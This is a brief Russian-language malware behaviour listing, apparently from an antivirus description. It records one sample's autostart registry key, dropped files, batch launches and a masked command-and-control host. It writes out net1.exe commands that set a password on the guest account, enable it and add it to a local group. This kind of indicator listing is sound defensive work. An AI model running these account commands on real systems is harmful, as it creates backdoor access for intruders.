Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '360tv' = '%WINDIR%\360tv.exe'
- %ALLUSERSPROFILE%\Start Menu\Programs\Startup\SVCHOST.SCR
- <SYSTEM32>\A53879F.exe
- <SYSTEM32>\cmd.exe /c <SYSTEM32>\DS.bat
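- <SYSTEM32>\net1.exe user guest axiao154 — задаёт пароль учётной записи guest
- <SYSTEM32>\net1.exe localgroup %USERNAME%s axiao154 /add — добавляет axiao154 в локальную группу; имя группы «%USERNAME%s», вероятно, — «Administrators», искажённое автоматической подстановкой %USERNAME% вместо имени пользователя
- <SYSTEM32>\net1.exe user guest /active:yes — включает учётную запись guest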
- <SYSTEM32>\rundll32.exe url.dll,FileProtocolHandler "<SYSTEM32>\8C3EC2F.BAT"
- <SYSTEM32>\cmd.exe /c ""<SYSTEM32>\8C3EC2F.BAT" "
- <SYSTEM32>\rundll32.exe url.dll,FileProtocolHandler "<SYSTEM32>\A53879F.exe"
- %WINDIR%\Temp\2011.exe
- <SYSTEM32>\DS.bat
- %WINDIR%\360tv.exe
- <SYSTEM32>\8C3EC2F.BAT
- <SYSTEM32>\A53879F.exe
- 'ax####54.3322.org':16366
- DNS ASK ax####54.3322.org
- ClassName: 'Indicator' WindowName: ''